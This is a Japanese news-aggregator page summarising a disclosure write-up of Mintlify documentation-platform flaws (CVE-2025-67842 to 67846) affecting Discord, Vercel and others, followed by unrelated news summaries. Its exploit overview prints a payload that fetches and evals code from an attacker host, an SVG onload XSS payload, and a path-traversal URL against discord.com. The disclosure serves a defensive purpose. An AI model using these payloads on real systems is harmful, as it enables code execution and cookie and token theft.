How to hack Discord, Vercel and more with one easy trick

2025/12/19 4:41

How to hack Discord, Vercel and more with one easy trick

RSS: https://news.ycombinator.com/rss

要約

Japanese Translation:

Mintlify – MDXファイルを使用し、Discord、Twitter、Vercel、Cursor などの顧客にサービスを提供する人気の B2B SaaS ドキュメントプラットフォーム。
セキュリティ脆弱性(CVE‑2025‑67843 – 67846)

  • CVE‑2025‑67843 – MDX のサーバー側レンダリングにより、JSX 式を介して任意の JavaScript が実行可能になり、攻撃者は環境変数やファイルシステムへの完全なサーバーアクセスを得られます。
  • CVE‑2025‑67842 –
    / _mintlify/static/[subdomain]/{…}
    ルートを通じたターゲット型 XSS;悪意のある SVG(例:
    <svg onload="...">
    )が任意のリポジトリから配信され、複数の高プロファイル顧客に対してワンクリックでクッキー窃盗やトークン抽出が可能になります。
  • CVE‑2025‑67845 – 静的資産修正後、CDN URL のパス・トラバーサル回避(
    …/discord/images/...%2F..%2F..%2Fevascoolcompany/xss.svg
    )により外部資産への再アクセスが可能となり、パッチの効果を打ち消しました。
  • CVE‑2025‑67844 – GitHub IDOR:Mintlify の API はリポジトリ設定時に所有権を検証せず、認可された任意のリポジトリのコミットデータへアクセス可能です。
  • CVE‑2025‑67846 – ダウングレード攻撃:古い Vercel デプロイメントを削除しないため、特定のデプロイ ID や git ref を介して脆弱な以前ビルドを狙うことができます。
    影響範囲: RCE により大量 XSS、改ざん、キャッシュ汚染、機能フラグ破壊、パス検証による DoS、および請求不正(PDF エクスポート)が発生します。ターゲット型 XSS は影響を受けた企業全体でクッキー窃盗やトークン抽出を可能にします。
    発見と対応: 著者、hackermon、および mdl の協力により開示され、報告後すぐにパッチが適用されました。Mintlify は発見者に 5,000 USD の報奨金を支払いました。
    CVE 毎の対策:
  • SSR で非シンプル MDX 式を無効化(CVE‑2025‑67843)。
  • 静的資産へのアクセスを同一組織に限定し、CDN パスチェックを徹底(CVE‑2025‑67842 & 67845)。
  • リポジトリ設定前に GitHub の所有権を検証(CVE‑2025‑67844)。
  • Vercel プレビュー デプロイメントに訪問者パスワードを追加し、古い脆弱デプロイメントを削除(CVE‑2025‑67846)。
    さらに読む: hackermon と mdl による追加レポートがより詳細な技術情報と実装シナリオを提供しています。

本文

ブログ記事 – Mintlify脆弱性シリーズ(CVE‑2025‑67843 – 67846)
協力者:Hackermon & MDL


1️⃣ 背景

  • Discord はドキュメントプラットフォームを Mintlify に切り替えました。MintlifyはMDXベースの文書をホストするB2B SaaSです。
  • Mintlify の顧客リストには、Discord、Twitter、Vercel、Cursor など主要企業が含まれます。

2️⃣ 発見事項

CVE説明影響
CVE‑2025‑67843サーバー側 RCE – MDX 式は静的生成時にサーバーで評価されます。攻撃者は任意コード(例:
eval(fetch(...))
)を実行できます。
サーバーレス環境への完全アクセス、トークン漏洩、キャッシュ汚染 → Mintlify のドキュメントサイト全体に対する大量 XSS と改ざん。
CVE‑2025‑678421クリック XSS(ターゲット型)
/ _mintlify/static/[subdomain]/{...path}
ルートがリポジトリ資産(SVG、PNG)を公開します。
<svg … onload="…">
をホストするとクライアント側スクリプトが実行されます。
認証不要でリンク先にアクセスしたユーザーに即時 XSS が発生。
CVE‑2025‑67845静的ルートバイパス – 静的資産 URL のパストラバーサル(
%2F..%2F
)で他組織の資産にアクセス可能です。
複数組織間でも同様の 1クリック XSS リスク。
CVE‑2025‑67844GitHub IDOR – Mintlify は設定時に GitHub リポジトリ所有権を検証しません。攻撃者は任意の認可済みリポジトリのコミット詳細を読み取れます。未承諾でリポジトリメタデータへアクセス可能。
CVE‑2025‑67846デプロイメントダウングレード攻撃 – Vercel デプロイは削除されません。攻撃者は
/ _mintlify/static/...
パスで古い脆弱なデプロイに再びアクセスできます。
プレビュー URL を通じて旧バージョンの脆弱性を再導入。

3️⃣ エクスプロイト概要

  1. RCE

    {!!fetch("https://attacker.town").then(r=>r.text()).then(c=>eval(c))}
    

    結果:Mintlify のサーバーレス関数が攻撃者コードを取得 →

    .env
    やファイルシステムを外部に送信。

  2. ターゲット XSS

    • SVG をホスト:
      <svg xmlns="http://www.w3.org/2000/svg" onload="alert(window.origin);"/>
    • アクセス例:
      https://discord.com/_mintlify/static/evascoolcompany/xss.svg
  3. 静的ルートバイパス

    https://discord.com/_mintlify/static/discord/images/create-team-owned-app.png%2F..%2F..%2F..%2Fevascoolcompany%2Fxss.svg
    
  4. IDOR & ダウングレード – GitHub リポジトリ設定や Vercel デプロイ URL を操作してコミットを閲覧したり、旧バグを再導入。


4️⃣ 緩和策(実装済み)

問題修正
CVE‑2025‑67843SSR 時に非シンプル MDX 式を拒否し、クライアント側のみでパース。
CVE‑2025‑67842資産アクセスを同一組織のみに制限。
CVE‑2025‑67845CDN パスを検証・正規化し、トラバーサルを禁止。
CVE‑2025‑67844Mintlify のリンク済みインストールに対して GitHub リポジトリ所有権を確認。
CVE‑2025‑67846プレビューデプロイにビジター用パスワードを追加し、古い Vercel デプロイを削除。

5️⃣ インパクト概要

  • Discord、Twitter、Vercel、Cursor など Fortune 500 大手企業のドキュメントが潜在的に侵害される可能性。
  • リスク:大量 XSS・改ざん、認証情報漏洩、リポジトリアクセスを介したサプライチェーン攻撃。

6️⃣ 今後のステップとリソース

  • HackermonMDL の詳細レポートで更なる技術的洞察を確認。
  • 対象顧客全リストは [こちら](#)から閲覧可能。
  • Mintlify は迅速にすべての問題をパッチし、報告者には責任ある開示として 5,000 USD が支払われました。

Marshift による作成 – Hackermon と MDL の協力に感謝します。

同じ日のほかのニュース

一覧に戻る →

2025/12/19 4:08

We pwned X, Vercel, Cursor, and Discord through a supply-chain attack

## Japanese Translation: Discordの新しいドキュメントプラットフォーム、Mintlifyにおいて、`/_mintlify/_static/[subdomain]/[…route]` エンドポイントを介して配信される任意の静的ファイルに悪意あるJavaScriptを注入できるクロスサイトスクリプティング(XSS)脆弱性が判明しました。16歳の高校生研究者は、Discord のドメインを指すSVG内にコードを埋め込み、そのリンクを開いた際にスクリプトが実行されることで、このサプライチェーン脆弱性を検証し、Mintlify の全顧客に影響する可能性があることを示しました。この欠陥は「xyzeva」という友人によって独立して確認され、両者は協力してテストと開示を行いました。報告後、Discord はドキュメントの公開を2時間停止し、以前のプラットフォームに戻し、すべての Mintlify ルートを削除(インシデントリンク: https://discordstatus.com/incidents/by04x5gnnng3)し、Mintlify は Slack を通じて問題を修正しました。研究者たちは合計で約11,000ドルの報奨金(Discordから4,000ドル、残りは Mintlify から)を受け取りました。この事例は、Twitter (X)、Vercel、Cursor、Discord 自体など多くのハイプロファイルユーザーに脅威を与える可能性がある単一のサードパーティコンポーネントのリスクを浮き彫りにし、外部サービスへのより厳格な検証と広範なセキュリティ監査の必要性を強調しています。

2025/12/17 6:04

Texas is suing all of the big TV makers for spying on what you watch

## Japanese Translation: > **概要:** > テキサス州司法長官ケン・パクストンは火曜日にソニー、サムスン、LG、ヒセン、TCL を対象に訴訟を提起し、同社のテレビが自動コンテンツ認識(ACR)を使用して視聴者の視聴内容を秘密裏に記録していると主張した。ACR はテレビ番組、ストリーミングサービス、YouTube、セキュリティカメラ、Apple AirPlay/Google Cast、および HDMI 接続デバイスなど、多岐にわたるソースから視聴覚データを取得し、訴訟ではメーカーがユーザーに対して隠れたまたは曖昧な開示で ACR の起動を促すと主張されている。サムスンとヒセンは 500 ミリ秒ごとにスクリーンショットを取得し、パクストンはデータがユーザーの知識なしに各社へ送信され、ターゲティング広告のために販売されると述べている。訴訟はテキサス州詐欺取引慣行法(Deceptive Trade Practices Act)を引用し、民事罰金およびテキサス州居住者からの ACR データ収集・共有・販売の停止を求めている。パクストンはまた TCL とヒセンの中国との関係に懸念を示し、同社のテレビを「中国支援監視デバイス」と呼んでいる。訴訟は Vizio が 2017 年に FTC およびニュージャージー州と合意した 220 万ドルの和解金を参照しており、類似の主張があったことを示している。サムスン、ソニー、LG、ヒセン、および TCL はまだコメント要請に応じていない。パクストンは「テレビを所有することは、ビッグテックや外国対立勢力に個人情報を渡すことを意味しない」と述べ、プライバシー保護への重点を強調した。

2025/12/19 3:55

How China built its ‘Manhattan Project’ to rival the West in AI chips

## Japanese Translation: **改善された要約** 深圳の研究所が、極紫外線(EUV)リソグラフィを使用して高度な半導体チップを製造できるプロトタイプを完成させました。EUVリソグラフィは、人間の髪の数千倍薄い回路をシリコンウェーハに刻むプロセスです。この機械は工場全床面積のほぼすべてを占める規模で、2025年初頭に完成し、現在テスト中です。元ASMLエンジニアがオランダ企業のEUV装置を逆解析して構築したもので、西側企業が長らく独占してきた技術です。プロトタイプが意図通りに機能すれば、中国はより細密な回路を持つチップを製造できるようになり、AIシステムやスマートフォン、高度兵器の性能向上につながります。この進展は、西側の独占的半導体製造能力から重要な技術が移転する可能性があり、世界のサプライチェーンと競争構造を変えることになるでしょう。

How to hack Discord, Vercel and more with one easy trick | そっか~ニュース